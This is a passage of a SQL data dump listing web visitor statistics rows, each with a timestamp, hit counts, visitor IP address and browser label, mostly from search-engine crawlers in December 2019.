0,'54.36.149.83','other'),(468642,1576270624,1,1,0,0,'54.36.149.59','other'),(468643,1576272197,9,9,0,0,'178.150.14.250','other'),(468644,1576272236,1,1,0,0,'66.249.64.28','chrome'),(468645,1576273054,1,1,0,0,'66.249.64.27','chrome'),(468646,1576274513,1,1,0,0,'8.29.198.25','other'),(468647,1576275472,1,1,0,0,'8.29.198.26','other'),(468648,1576275727,1,1,0,0,'207.46.13.94','other'),(468649,1576276076,1,1,0,0,'66.249.64.26','chrome'),(468650,1576276298,1,1,0,0,'66.249.64.28','chrome'),(468651,1576277488,1,1,0,0,'141.8.132.37','other'),(468652,1576277889,1,1,0,0,'207.46.13.135','other'),(468653,1576277958,1,1,0,0,'66.249.64.26','chrome'),(468654,1576278655,1,1,0,0,'54.36.149.94','other'),(468655,1576279301,1,1,0,0,'213.180.203.44','other'),(468656,1576280015,1,1,0,0,'66.249.64.26','chrome'),(468657,1576280028,1,1,0,0,'209.17.96.210','other'),(468658,1576280298,1,1,0,0,'54.36.149.61','other'),(468659,1576281542,1,1,0,0,'207.46.13.94','other'),(468660,1576282053,1,1,0,0,'207.46.13.135','other'),(468661,1576282310,1,1,0,0,'213.180.203.44','other'),(468662,1576283507,1,1,0,0,'66.249.64.27','chrome'),(468663,1576283750,1,1,0,0,'213.180.203.44','other'),(468664,1576284914,1,1,0,0,'62.205.134.182','other'),(468665,1576284922,3,3,0,0,'193.203.51.30','firefox'),(468666,1576284924,1,1,0,0,'193.203.51.30','chrome'),(468667,1576285191,1,1,0,0,'66.249.70.62','chrome'),(468668,1576285201,1,1,0,0,'54.36.149.69','other'),(468669,1576285406,1,1,0,0,'8.29.198.27','other'),(468670,1576285476,2,2,0,0,'213.180.203.44','other'),(468671,1576286215,1,1,0,0,'54.36.149.15','other'),(468672,1576286320,1,1,0,0,'8.29.198.26','other'),(468673,1576286325,1,1,0,0,'54.36.149.39','other'),(468674,1576286331,1,1,0,0,'66.249.64.26','chrome'),(468675,1576286752,2,2,0,0,'66.249.64.27','chrome'),(468676,1576287371,1,1,0,0,'66.249.64.26','chrome'),(468677,1576287522,1,1,0,0,'207.46.13.94','other'),(468678,1576287811,1,1,0,0,'2.93.79.184','other'),(468679,1576288434,1,1,0,0,'213.180.203.44','other'),(468680,1576288995,1,1,0,0,'54.36.149.15','other'),(468681,1576289092,1,1,0,0,'54.244.40.41','other'),(468682,1576290286,1,1,0,0,'207.46.13.94','other'),(468683,1576291098,1,1,0,0,'213.180.203.44','other'),(468684,1576291805,1,1,0,0,'66.249.64.26','chrome'),(468685,1576292017,1,1,0,0,'54.36.149.93','other'),(468686,1576292721,1,1,0,0,'66.249.64.27','chrome'),(468687,1576294771,1,1,0,0,'54.218.255.78','chrome'),(468688,1576294774,1,1,0,0,'52.41.211.72','other'),(468689,1576295092,1,1,0,0,'13.66.139.0','other'),(468690,1576296272,1,1,0,0,'54.36.149.85','other'),(468691,1576296302,1,1,0,0,'8.29.198.25','other'),(468692,1576296526,1,1,0,0,'207.46.13.135','other'),(468693,1576296560,2,2,0,0,'207.46.13.94','other'),(468694,1576296725,2,2,0,0,'213.180.203.44','other'),(468695,1576297186,1,1,0,0,'8.29.198.26','other'),(468696,1576297541,1,1,0,0,'54.36.149.32','other'),(468697,1576297702,1,1,0,0,'213.180.203.44','other'),(468698,1576300397,1,1,0,0,'94.153.107.24','chrome'),(468699,1576300629,1,1,0,0,'207.46.13.140','other'),(468700,1576300998,1,1,0,0,'54.36.149.104','other'),(468701,1576301249,1,1,0,0,'54.36.149.27','other'),(468702,1576302194,1,1,0,0,'62.205.134.182','other'),(468703,1576303461,1,1,0,0,'213.180.203.37','other'),(468704,1576303830,1,1,0,0,'207.46.13.140','other'),(468705,1576304633,1,1,0,0,'213.180.203.44','other'),(468706,1576304847,1,1,0,0,'66.249.64.26','chrome'),(468707,1576305672,2,2,0,0,'213.180.203.44','other'),(468708,1576305759,1,1,0,0,'54.36.149.102','other'),(468709,1576305815,1,1,0,0,'68.183.108.166','other'),(468710,1576306757,1,1,0,0,'31.13.103.11','other'),(468711,1576306759,1,1,0,0,'31.13.103.16','other'),(468712,1576306888,1,1,0,0,'54.36.149.15','other'),(468713,1576306974,1,1,0,0,'17.58.101.25','other'),(468714,1576307183,1,1,0,0,'8.29.198.25','other'),(468715,1576307364,1,1,0,0,'213.180.203.44','other'),(468716,1576308011,1,1,0,0,'207.46.13.94','other'),(468717,1576308038,1,1,0,0,'8.29.198.27','other'),(468718,1576309002,2,2,0,0,'66.249.70.62','chrome'),(468719,1576309415,1,1,0,0,'54.36.149.59','other'),(468720,1576309984,1,0,1,0,'66.249.70.62',''),(468721,1576310174,1,1,0,0,'213.180.203.44','other'),(468722,1576310214,1,1,0,0,'66.249.64.26','chrome'),(468723,1576310743,1,1,0,0,'207.46.13.190','other'),(468724,1576311125,1,1,0,0,'54.36.149.28','other'),(468725,1576311244,1,1,0,0,'213.180.203.44','other'),(468726,1576311479,1,1,0,0,'54.36.149.24','other'),(468727,1576311514,1,1,0,0,'54.36.149.37','other'),(468728,1576311822,2,2,0,0,'207.46.13.140','other'),(468729,1576311851,1,1,0,0,'207.46.13.190','other'),(468730,1576312864,2,2,0,0,'207.46.13.140','other'),(468731,1576313236,1,1,0,0,'213.180.203.44','other'),(468732,1576313866,1,1,0,0,'54.36.149.55','other'),(468733,1576314630,1,1,0,0,'66.249.64.27','chrome'),(468734,1576314820,1,1,0,0,'207.46.13.140','other'),(468735,1576315216,1,1,0,0,'95.108.213.55','other'),(468736,1576315242,1,1,0,0,'213.180.203.37','other'),(468737,1576315446,1,1,0,0,'157.55.39.147','other'),(468738,1576315507,1,1,0,0,'188.163.32.130','msie'),(468739,1576316114,1,1,0,0,'157.55.39.68','other'),(468740,1576316336,1,1,0,0,'54.36.149.98','other'),(468741,1576316606,1,1,0,0,'66.249.64.27','chrome'),(468742,1576318014,1,1,0,0,'13.66.139.0','other'),(468743,1576318071,1,1,0,0,'8.29.198.25','other'),(468744,1576318086,1,1,0,0,'54.36.149.21','other'),(468745,1576318439,1,1,0,0,'66.249.64.26','chrome'),(468746,1576318448,1,1,0,0,'213.180.203.44','other'),(468747,1576318907,1,1,0,0,'8.29.198.27','other'),(468748,1576319146,2,2,0,0,'157.55.39.147','other'),(468749,1576320409,1,1,0,0,'207.46.13.140','other'),(468750,1576320776,1,1,0,0,'66.249.64.28','chrome'),(468751,1576321226,1,1,0,0,'207.46.13.190','other'),(468752,1576321468,1,1,0,0,'213.180.203.44','other'),(468753,1576322021,1,1,0,0,'109.74.154.72','chrome'),(468754,1576322345,1,1,0,0,'54.36.149.100','other'),(468755,1576322765,2,2,0,0,'213.180.203.44','other'),(468756,1576322931,1,1,0,0,'54.36.149.28','other'),(468757,1576323510,1,1,0,0,'207.46.13.140','other'),(468758,1576323766,1,1,0,0,'213.180.203.44','other'),(468759,1576323820,1,1,0,0,'54.36.149.82','other'),(468760,1576324288,1,1,0,0,'185.246.208.177','msie'),(468761,1576325046,1,1,0,0,'13.66.139.0','other'),(468762,1576326208,1,1,0,0,'31.13.115.12','other'),(468763,1576326659,1,1,0,0,'141.8.142.50','other'),(468764,1576326663,1,1,0,0,'37.9.113.177','other'),(468765,1576326667,1,1,0,0,'213.180.203.37','other'),(468766,1576326969,1,1,0,0,'31.13.127.12','other'),(468767,1576326970,1,1,0,0,'31.13.127.15','other'),(468768,1576326985,1,1,0,0,'54.36.149.106','other'),(468769,1576327092,1,1,0,0,'66.249.64.30','chrome'),(468770,1576327283,1,1,0,0,'54.36.149.6','other'),(468771,1576327681,1,1,0,0,'207.46.13.140','other'),(468772,1576327695,1,1,0,0,'213.180.203.37','other'),(468773,1576328510,1,1,0,0,'66.249.64.30','chrome'),(468774,1576328940,2,2,0,0,'8.29.198.26','other'),(468775,1576329659,1,1,0,0,'37.9.113.163','other'),(468776,1576330771,1,1,0,0,'66.249.64.30','chrome'),(468777,1576331788,2,2,0,0,'207.46.13.140','other'),(468778,1576331812,2,2,0,0,'207.46.13.190','other'),(468779,1576331956,1,1,0,0,'54.36.149.15','other'),(468780,1576332456,1,1,0,0,'66.249.64.28','chrome'),(468781,1576333064,1,1,0,0,'54.36.149.11','other'),(468782,1576333663,2,2,0,0,'66.249.64.30','chrome'),(468783,1576333814,1,1,0,0,'213.180.203.44','other'),(468784,1576334826,1,1,0,0,'66.249.64.30','chrome'),(468785,1576335736,1,1,0,0,'54.36.149.66','other'),(468786,1576336348,1,1,0,0,'157.55.39.168','other'),(468787,1576336800,1,1,0,0,'207.46.13.140','other'),(468788,1576336837,1,1,0,0,'207.46.13.190','other'),(468789,1576337117,3,3,0,0,'34.68.184.102','chrome'),(468791,1576337129,2,2,0,0,'35.202.3.98','chrome'),(468792,1576337142,2,2,0,0,'35.225.208.155','chrome'),(468794,1576337158,5,5,0,0,'34.68.203.114','chrome'),(468795,1576337177,2,2,0,0,'34.68.133.217','chrome'),(468797,1576337331,2,2,0,0,'157.55.39.137','other'),(468798,1576337437,1,1,0,0,'54.36.149.14','other'),(468799,1576338588,1,1,0,0,'54.36.149.54','other'),(468800,1576339000,2,2,0,0,'213.180.203.44','other'),(468801,1576339026,1,1,0,0,'54.36.149.12','other'),(468802,1576339143,1,1,0,0,'54.36.149.37','other'),(468803,1576339821,1,1,0,0,'8.29.198.27','other'),(468804,1576340207,1,1,0,0,'54.36.149.47','other'),(468805,1576340231,1,1,0,0,'54.36.149.66','other'),(468806,1576340609,1,1,0,0,'8.29.198.26','other'),(468807,1576341004,3,3,0,0,'213.180.203.44','other'),(468808,1576341131,1,1,0,0,'213.180.203.37','other'),(468809,1576341142,1,1,0,0,'88.99.2.203','other'),(468810,1576341245,1,1,0,0,'141.8.142.2','other'),(468811,1576341339,1,1,0,0,'66.249.64.30','chrome'),(468812,1576341520,1,1,0,0,'38.99.62.94','other'),(468813,1576341770,1,1,0,0,'157.55.39.168','other'),(468814,1576342175,1,1,0,0,'66.249.70.62','chrome'),(468815,1576342412,1,1,0,0,'54.36.149.92','other'),(468816,1576342508,1,1,0,0,'88.99.2.203','other'),(468817,1576342543,1,1,0,0,'91.196.178.173','chrome'),(468818,1576342630,1,1,0,0,'54.36.149.56','other'),(468819,1576343507,1,1,0,0,'88.99.2.203','other'),(468820,1576343591,1,1,0,0,'91.196.178.57','chrome'),(468821,1576343771,1,1,0,0,'66.249.64.28','chrome'),(468822,1576343790,1,1,0,0,'51.68.152.26','chrome'),(468823,1576343812,1,1,0,0,'157.55.39.137','other'),(468824,1576344427,1,1,0,0,'88.99.2.203','other'),(468825,1576344582,1,1,0,0,'213.180.203.44','other'),(468826,1576344618,1,1,0,0,'141.8.142.2','other'),(468827,1576345225,1,1,0,0,'54.36.149.19','other'),(468828,1576345398,1,1,0,0,'88.99.2.203','other'),(468829,1576345699,1,1,0,0,'66.249.64.30','chrome'),(468830,1576346423,1,1,0,0,'88.99.2.203','other'),(468831,1576346597,1,1,0,0,'54.36.149.22','other'),(468832,1576346908,1,1,0,0,'54.36.149.5','other'),(468833,1576346971,1,1,0,0,'142.234.203.245','chrome'),(468834,1576346985,1,1,0,0,'107.158.86.202','chrome'),(468835,1576347242,1,1,0,0,'54.36.149.89','other'),(468836,1576347543,1,1,0,0,'54.36.149.35','other'),(468837,1576348121,1,1,0,0,'66.249.64.30','chrome'),(468838,1576348843,1,1,0,0,'54.36.149.86','other'),(468839,1576349441,1,1,0,0,'66.249.64.28','chrome'),(468840,1576350700,2,2,0,0,'8.29.198.26','other'),(468841,1576351149,1,1,0,0,'66.249.64.30','chrome'),(468842,1576351720,1,1,0,0,'54.36.149.17','other'),(468843,1576352177,2,2,0,0,'66.249.64.30','chrome'),(468844,1576352251,1,1,0,0,'54.36.149.90','other'),(468845,1576352987,1,1,0,0,'66.249.64.28','chrome'),(468846,1576353173,3,3,0,0,'35.184.175.75','chrome'),(468847,1576353280,1,1,0,0,'46.219.13.88','other'),(468848,1576353416,1,1,0,0,'54.36.149.13','other'),(468849,1576353482,1,1,0,0,'54.36.149.88','other'),(468850,1576353602,1,1,0,0,'66.249.70.36','chrome'),(468851,1576353605,1,1,0,0,'66.249.64.30','chrome'),(468852,1576353705,2,2,0,0,'207.46.13.148','other'),(468853,1576355098,1,1,0,0,'54.36.149.79','other'),(468854,1576355116,1,1,0,0,'54.36.149.87','other'),(468855,1576355415,1,1,0,0,'66.249.64.28','chrome'),(468856,1576355726,1,1,0,0,'91.196.178.41','chrome'),(468857,1576356054,1,1,0,0,'54.36.149.91','other'),(468858,1576356509,1,1,0,0,'157.55.39.137','other'),(468859,1576357134,1,1,0,0,'54.36.149.103','other'),(468860,1576357821,1,1,0,0,'157.55.39.137','other'),(468861,1576357964,1,1,0,0,'66.249.64.30','chrome'),(468862,1576358060,1,1,0,0,'31.202.101.40','chrome'),(468863,1576358417,1,1,0,0,'31.13.127.18','other'),(468864,1576358419,1,1,0,0,'31.13.127.9','other'),(468865,1576358421,1,1,0,0,'31.13.127.10','other'),(468866,1576358463,4,4,0,0,'66.249.64.28','chrome'),(468867,1576358995,1,1,0,0,'193.106.30.99','firefox'),(468868,1576359647,1,1,0,0,'5.45.207.49','other'),(468869,1576360163,1,1,0,0,'141.8.132.28','other'),(468870,1576360227,1,1,0,0,'54.36.149.73','other'),(468871,1576360388,1,1,0,0,'54.36.149.14','other'),(468872,1576360465,1,1,0,0,'207.46.13.148','other'),(468873,1576360938,1,1,0,0,'141.8.132.12','other'),(468874,1576361253,1,1,0,0,'66.249.64.28','chrome'),(468875,1576361555,1,1,0,0,'54.36.149.55','other'),(468876,1576361572,1,1,0,0,'8.29.198.26','other'),(468877,1576361838,1,1,0,0,'207.46.13.148','other'),(468878,1576362217,1,1,0,0,'54.36.149.2','other'),(468879,1576362363,1,1,0,0,'8.29.198.25','other'),(468880,1576362659,1,1,0,0,'141.8.142.2','other'),(468881,1576362675,1,1,0,0,'13.66.139.0','other'),(468882,1576362744,1,1,0,0,'157.55.39.117','other'),(468883,1576363705,1,1,0,0,'66.249.70.62','chrome'),(468884,1576363816,1,1,0,0,'37.9.113.39','other'),(468885,1576364419,1,1,0,0,'54.36.149.98','other'),(468886,1576364943,1,1,0,0,'54.36.149.30','other'),(468887,1576364979,1,1,0,0,'141.8.132.28','other'),(468888,1576365693,1,1,0,0,'157.55.39.117','other'),(468889,1576367684,1,1,0,0,'207.46.13.148','other'),(468890,1576368215,1,1,0,0,'3.135.222.119','chrome'),(468891,1576368294,1,1,0,0,'54.36.149.104','other'),(468892,1576368744,1,1,0,0,'66.249.64.28','chrome'),(468893,1576369466,1,1,0,0,'37.9.113.163','other'),(468894,1576369470,1,1,0,0,'141.8.132.2','other'),(468895,1576370351,1,1,0,0,'37.9.113.39','other'),(468896,1576370486,1,1,0,0,'66.249.64.28','chrome'),(468897,1576370667,1,1,0,0,'54.36.149.72','other'),(468898,1576371315,1,1,0,0,'62.205.134.182','other'),(468899,1576371317,1,1,0,0,'141.8.142.50','other'),(468900,1576372434,2,2,0,0,'8.29.198.26','other'),(468901,1576372706,4,4,0,0,'60.191.38.77','firefox'),(468902,1576372800,1,1,0,0,'54.36.149.95','other'),(468903,1576373247,1,1,0,0,'207.46.13.96','other'),(468904,1576373855,1,1,0,0,'157.55.39.168','other'),(468905,1576374177,1,1,0,0,'54.36.149.58','other'),(468906,1576374939,1,1,0,0,'13.66.139.0','other'),(468907,1576375535,1,1,0,0,'54.36.149.56','other'),(468908,1576375932,1,1,0,0,'54.36.149.50','other'),(468909,1576376157,1,1,0,0,'37.9.113.177','other'),(468910,1576376425,1,1,0,0,'66.249.64.30','chrome'),(468911,1576376928,1,1,0,0,'54.36.149.60','other'),(468912,1576377003,1,1,0,0,'54.36.149.52','other'),(468913,1576377164,1,1,0,0,'37.9.113.39','other'),(468914,1576377608,1,1,0,0,'54.36.149.39','other'),(468915,1576377712,1,1,0,0,'66.249.64.30','chrome'),(468916,1576378938,1,1,0,0,'178.154.200.13','other'),(468917,1576379544,1,1,0,0,'141.8.132.2','other'),(468918,1576380052,1,1,0,0,'141.8.183.15','other'),(468919,1576380435,1,1,0,0,'157.55.39.117','other'),(468920,1576380701,1,1,0,0,'18.236.106.9','chrome'),(468921,1576380704,1,1,0,0,'52.34.24.33','other'),(468922,1576381401,1,1,0,0,'37.9.113.163','other'),(468923,1576381898,1,1,0,0,'54.36.149.73','other'),(468924,1576382007,1,1,0,0,'2.56.8.168','chrome'),(468925,1576382905,1,1,0,0,'54.36.149.80','other'),(468926,1576383280,1,1,0,0,'8.29.198.27','other'),(468927,1576384106,1,1,0,0,'8.29.198.26','other'),(468928,1576384351,1,1,0,0,'52.162.161.148','other'),(468929,1576385377,1,1,0,0,'54.36.149.98','other'),(468930,1576386092,1,1,0,0,'66.249.64.28','chrome'),(468931,1576386313,1,1,0,0,'54.36.149.28','other'),(468932,1576387113,1,1,0,0,'94.153.102.78','chrome'),(468933,1576387353,1,1,0,0,'207.46.13.147','other'),(468934,1576387379,1,1,0,0,'141.8.142.161','other'),(468935,1576387382,1,1,0,0,'91.196.178.132','firefox'),(468936,1576387878,1,1,0,0,'141.8.132.2','other'),(468937,1576387970,1,1,0,0,'141.8.183.33','other'),(468938,1576388440,1,1,0,0,'66.249.64.30','chrome'),(468939,1576388660,1,1,0,0,'54.36.149.9','other'),(468940,1576388676,1,1,0,0,'95.108.213.3','other'),(468941,1576388683,1,1,0,0,'62.205.134.182','other'),(468942,1576389040,1,1,0,0,'157.55.39.117','other'),(468943,1576389285,1,1,0,0,'207.46.13.147','other'),(468944,1576390062,1,1,0,0,'141.8.132.12','other'),(468945,1576390861,1,1,0,0,'157.55.39.117','other'),(468946,1576390873,1,1,0,0,'54.36.149.70','other'),(468947,1576390961,1,1,0,0,'141.8.183.33','other'),(468948,1576391178,1,1,0,0,'54.36.149.25','other'),(468949,1576391931,1,1,0,0,'213.180.203.44','other'),(468950,1576392123,1,1,0,0,'66.249.70.33','chrome'),(468951,1576392135,3,3,0,0,'66.249.64.28','chrome'),(468952,1576393037,1,1,0,0,'141.8.132.12','other'),(468953,1576393051,2,2,0,0,'31.13.103.1','other'),(468954,1576393402,1,1,0,0,'157.55.39.117','other'),(468955,1576393882,1,1,0,0,'66.249.64.30','chrome'),(468956,1576394139,2,2,0,0,'8.29.198.25','other'),(468957,1576395077,1,1,0,0,'141.8.132.37','other'),(468958,1576395184,1,1,0,0,'54.36.149.101','other'),(468959,1576396094,1,1,0,0,'45.77.244.164','chrome'),(468960,1576397189,1,1,0,0,'54.36.149.45','other'),(468961,1576397492,1,1,0,0,'31.13.127.14','other'),(468964,1576397493,1,1,0,0,'31.13.127.17','other'),(468965,1576398540,1,1,0,0,'141.8.132.37','other'),(468966,1576400386,1,1,0,0,'207.46.13.147','other'),(468967,1576401068,1,1,0,0,'54.36.149.40','other'),(468968,1576401216,1,1,0,0,'95.108.181.103','other'),(468969,1576402321,1,1,0,0,'178.154.200.13','other'),(468970,1576402325,1,1,0,0,'141.8.142.177','other'),(468971,1576403443,2,2,0,0,'207.46.13.41','other'),(468972,1576404163,1,1,0,0,'207.46.13.147','other'),(468973,1576404510,1,1,0,0,'178.154.200.33','other'),(468974,1576404612,1,1,0,0,'54.36.149.35','other'),(468975,1576404994,1,1,0,0,'8.29.198.25','other'),(468976,1576405777,2,2,0,0,'66.249.64.28','chrome'),(468977,1576405785,1,1,0,0,'111.202.101.124','other'),(468978,1576405809,1,1,0,0,'8.29.198.26','other'),(468979,1576406037,2,2,0,0,'207.46.13.147','other'),(468980,1576406065,1,1,0,0,'13.66.139.0','other'),(468981,1576406442,1,1,0,0,'66.249.64.30','chrome'),(468982,1576406541,1,1,0,0,'37.9.113.10','other'),(468983,1576407603,1,1,0,0,'91.196.178.169','chrome'),(468984,1576407691,1,1,0,0,'31.13.127.5','other'),(468985,1576407692,1,1,0,0,'31.13.127.12','other'),(468986,1576407695,1,1,0,0,'66.249.70.36','chrome'),(468987,1576407913,1,1,0,0,'207.46.13.41','other'),(468988,1576407953,1,1,0,0,'109.74.154.72','chrome'),(468989,1576408371,1,1,0,0,'54.36.149.28','other'),(468990,1576409226,1,1,0,0,'54.36.149.31','other'),(468991,1576409615,1,1,0,0,'66.249.64.30','chrome'),(468992,1576410048,1,1,0,0,'66.249.64.28','chrome'),(468993,1576411042,1,1,0,0,'46.133.219.13','firefox'),(468994,1576411172,1,1,0,0,'213.180.203.37','other'),(468995,1576411366,1,1,0,0,'188.152.102.14','chrome'),(468996,1576411919,1,1,0,0,'213.180.203.44','other'),(468997,1576412603,1,1,0,0,'66.249.64.30','chrome'),(468998,1576413150,1,1,0,0,'95.108.181.103','other'),(468999,1576413355,1,1,0,0,'178.154.171.66','other'),(469000,1576413492,1,1,0,0,'207.46.13.41','other'),(469001,1576415009,1,1,0,0,'37.9.113.10','other'),(469002,1576415739,1,1,0,0,'66.249.64.30','chrome'),(469003,1576415863,1,1,0,0,'8.29.198.26','other'),(469004,1576416417,1,1,0,0,'207.46.13.147','other'),(469005,1576416524,1,1,0,0,'54.36.149.102','other'),(469006,1576416671,1,1,0,0,'91.196.178.169','chrome'),(469007,1576416673,1,1,0,0,'8.29.198.25','other'),(469008,1576416933,1,1,0,0,'141.8.142.50','other'),(469009,1576417530,2,2,0,0,'66.249.64.28','chrome'),(469010,1576417591,1,1,0,0,'91.196.178.169','chrome'),(469011,1576417656,1,1,0,0,'207.46.13.147','other'),(469012,1576417897,3,3,0,0,'207.46.13.41','other'),(469013,1576417949,1,1,0,0,'95.108.213.3','other'),(469014,1576418014,1,1,0,0,'141.8.142.2','other'),(469015,1576418181,1,1,0,0,'91.196.178.36','chrome'),(469016,1576418685,1,1,0,0,'13.66.139.0','other'),(469017,1576419538,2,2,0,0,'207.46.13.41','other'),(469018,1576421842,1,1,0,0,'207.46.13.147','other'),(469019,1576421923,1,1,0,0,'141.8.132.9','other'),(469020,1576422309,1,1,0,0,'66.249.64.28','chrome'),(469021,1576423605,2,2,0,0,'207.46.13.16','other'),(469022,1576424048,1,1,0,0,'66.249.70.62','chrome'),(469023,1576424178,1,1,0,0,'207.46.13.41','other'),(469024,1576424191,2,2,0,0,'66.249.64.28','chrome'),(469025,1576424618,1,1,0,0,'66.249.64.30','chrome'),(469026,1576425155,1,1,0,0,'207.46.13.16','other'),(469027,1576425307,1,1,0,0,'91.196.178.57','chrome'),(469028,1576426053,1,1,0,0,'91.196.178.29','chrome'),(469029,1576426587,1,1,0,0,'207.46.13.147','other'),(469030,1576426623,1,1,0,0,'121.46.119.97','chrome'),(469031,1576426734,2,2,0,0,'8.29.198.25','other'),(469032,1576426959,1,1,0,0,'141.8.142.115','other'),(469033,1576427018,1,1,0,0,'141.8.188.18','other'),(469034,1576427110,1,1,0,0,'91.196.178.57','chrome'),(469035,1576429401,1,1,0,0,'141.8.188.38','other'),(469036,1576429776,1,1,0,0,'91.209.11.236','other'),(469037,1576430337,1,1,0,0,'207.46.13.16','other'),(469038,1576431334,1,1,0,0,'66.249.64.27','chrome'),(469039,1576432512,1,1,0,0,'46.211.242.94','chrome'),(469040,1576432983,1,1,0,0,'207.46.13.16','other'),(469041,1576433173,1,1,0,0,'93.72.141.140','firefox'),(469042,1576434148,1,1,0,0,'207.46.13.147','other'),(469043,1576434758,1,1,0,0,'66.249.64.26','chrome'),(469044,1576435230,1,1,0,0,'37.9.113.177','other'),(469045,1576435499,1,1,0,0,'141.8.142.2','other'),(469046,1576436051,1,1,0,0,'66.249.64.26','chrome'),(469047,1576437002,1,1,0,0,'66.249.64.27','chrome'),(469048,1576437117,1,1,0,0,'207.46.13.147','other'),(469049,1576437381,1,1,0,0,'141.8.142.119','other'),(469050,1576437587,2,2,0,0,'8.29.198.27','other'),(469051,1576438027,1,1,0,0,'66.249.64.26','chrome'),(469052,1576438445,1,1,0,0,'141.8.142.44','other'),(469053,1576439463,1,1,0,0,'141.8.142.50','other'),(469054,1576439711,1,1,0,0,'66.249.70.36','chrome'),(469055,1576439728,2,2,0,0,'66.249.64.27','chrome'),(469056,1576439853,1,1,0,0,'207.46.13.41','other'),(469057,1576439897,1,1,0,0,'207.46.13.147','other'),(469058,1576440158,1,1,0,0,'207.46.13.16','other'),(469059,1576441286,1,1,0,0,'207.46.13.147','other'),(469060,1576441541,1,1,0,0,'66.249.70.36','chrome'),(469061,1576441603,1,1,0,0,'141.8.142.119','other'),(469062,1576441846,1,1,0,0,'178.154.171.7','other'),(469063,1576442746,1,1,0,0,'87.250.224.90','other'),(469064,1576442779,1,1,0,0,'37.9.113.163','other'),(469065,1576443196,1,1,0,0,'207.46.13.16','other'),(469066,1576443721,1,1,0,0,'66.249.70.36','chrome'),(469067,1576443783,1,1,0,0,'66.249.64.26','chrome'),(469068,1576443823,1,1,0,0,'66.249.64.27','chrome'),(469069,1576444422,2,2,0,0,'207.46.13.16','other'),(469070,1576444771,1,1,0,0,'178.154.200.33','other'),(469071,1576444834,1,1,0,0,'66.249.70.62','chrome'),(469072,1576444903,1,1,0,0,'66.249.64.28','chrome'),(469073,1576445805,2,2,0,0,'207.46.13.124','other'),(469074,1576445911,1,1,0,0,'141.8.132.12','other'),(469075,1576446004,2,2,0,0,'66.249.64.28','chrome'),(469076,1576446677,1,1,0,0,'66.249.70.33','chrome'),(469077,1576446725,1,1,0,0,'66.249.64.27','chrome'),(469078,1576446925,2,2,0,0,'207.46.13.124','other'),(469079,1576447054,1,1,0,0,'178.154.200.60','other'),(469080,1576447181,1,1,0,0,'141.8.142.2','other'),(469081,1576448449,2,2,0,0,'8.29.198.25','other'),(469082,1576448832,1,1,0,0,'46.211.92.216','chrome'),(469083,1576448837,1,1,0,0,'207.46.13.124','other'),(469084,1576449387,1,1,0,0,'141.8.142.50','other'),(469085,1576449483,1,1,0,0,'207.46.13.16','other'),(469086,1576451093,1,1,0,0,'66.249.64.26','chrome'),(469087,1576451515,1,1,0,0,'141.8.132.37','other'),(469088,1576451603,1,1,0,0,'178.154.171.66','other'),(469089,1576452536,1,1,0,0,'207.46.13.124','other'),(469090,1576452873,3,3,0,0,'66.249.64.28','chrome'),(469091,1576453410,1,1,0,0,'66.249.64.27','chrome'),(469092,1576453493,2,2,0,0,'66.249.64.26','chrome'),(469093,1576454519,1,1,0,0,'66.249.64.26','chrome'),(469094,1576455443,1,1,0,0,'207.46.13.124','other'),(469095,1576456811,2,2,0,0,'207.46.13.197','other'),(469096,1576457714,1,1,0,0,'62.205.134.182','other'),(469097,1576457978,1,1,0,0,'207.46.13.124','other'),(469098,1576458041,1,1,0,0,'66.249.70.36','chrome'),(469099,1576458773,1,1,0,0,'66.249.70.33','chrome'),(469100,1576458971,2,2,0,0,'66.249.64.28','chrome'),(469101,1576459093,2,2,0,0,'66.249.64.27','chrome'),(469102,1576459320,2,2,0,0,'8.29.198.25','other'),(469103,1576459382,2,2,0,0,'66.249.70.36','chrome'),(469104,1576459752,1,1,0,0,'157.55.39.69','other'),(469105,1576460494,1,1,0,0,'66.249.64.27','chrome'),(469106,1576460552,1,1,0,0,'66.249.64.28','chrome'),(469107,1576461110,3,3,0,0,'66.249.64.26','chrome'),(469108,1576461722,3,3,0,0,'66.249.64.27','chrome'),(469109,1576462233,1,1,0,0,'54.68.168.207','other'),(469110,1576465337,1,1,0,0,'157.55.39.69','other'),(469111,1576465541,1,1,0,0,'66.249.64.26','chrome'),(469113,1576465950,1,1,0,0,'66.249.70.62','chrome'),(469114,1576465960,2,2,0,0,'207.46.13.197','other'),(469115,1576466637,4,4,0,0,'66.249.64.28','chrome'),(469116,1576466816,4,4,0,0,'66.249.64.27','chrome'),(469117,1576466988,1,1,0,0,'34.223.251.133','chrome'),(469118,1576466991,1,1,0,0,'52.41.211.72','other'),(469119,1576467197,3,3,0,0,'66.249.64.26','chrome'),(469120,1576467798,1,1,0,0,'141.8.183.15','other'),(469121,1576468396,2,2,0,0,'66.249.64.26','chrome'),(469122,1576468406,1,1,0,0,'66.249.64.27','chrome'),(469123,1576468750,1,1,0,0,'141.8.188.18','other'),(469124,1576470171,2,2,0,0,'8.29.198.25','other'),(469125,1576471517,1,1,0,0,'66.249.70.36','chrome'),(469126,1576471547,2,2,0,0,'66.249.64.26','chrome'),(469127,1576472590,1,1,0,0,'157.55.39.69','other'),(469128,1576473302,1,1,0,0,'31.13.115.17','other'),(469129,1576473303,1,1,0,0,'31.13.115.15','other'),(469130,1576473315,1,1,0,0,'66.249.70.62','chrome'),(469131,1576473997,1,1,0,0,'207.46.13.124','other'),(469132,1576474611,2,2,0,0,'66.249.64.28','chrome'),(469133,1576474622,3,3,0,0,'66.249.64.26','chrome'),(469134,1576474863,1,1,0,0,'66.249.70.36','chrome'),(469135,1576474922,1,1,0,0,'66.249.70.33','chrome'),(469136,1576475148,1,1,0,0,'66.249.64.27','chrome'),(469137,1576475187,1,1,0,0,'62.205.134.182','other'),(469138,1576475656,1,1,0,0,'207.46.13.124','other'),(469139,1576476256,1,1,0,0,'66.249.70.62','chrome'),(469140,1576476470,1,1,0,0,'207.46.13.197','other'),(469141,1576477455,1,1,0,0,'141.8.142.50','other'),(469142,1576478071,1,1,0,0,'207.46.13.197','other'),(469143,1576478116,1,1,0,0,'157.55.39.226','other'),(469144,1576478243,1,1,0,0,'157.55.39.69','other'),(469145,1576479288,1,1,0,0,'66.249.64.27','chrome'),(469146,1576480135,1,1,0,0,'66.249.64.28','chrome'),(469147,1576480328,1,1,0,0,'157.55.39.226','other'),(469148,1576480367,12,12,0,0,'3.81.29.254','other'),(469149,1576480671,1,1,0,0,'91.196.178.90','chrome'),(469150,1576481020,2,2,0,0,'8.29.198.25','other'),(469151,1576481081,1,1,0,0,'91.196.178.162','chrome'),(469152,1576481522,10,10,0,0,'3.81.29.254','other'),(469153,1576481557,1,1,0,0,'157.55.39.226','other'),(46915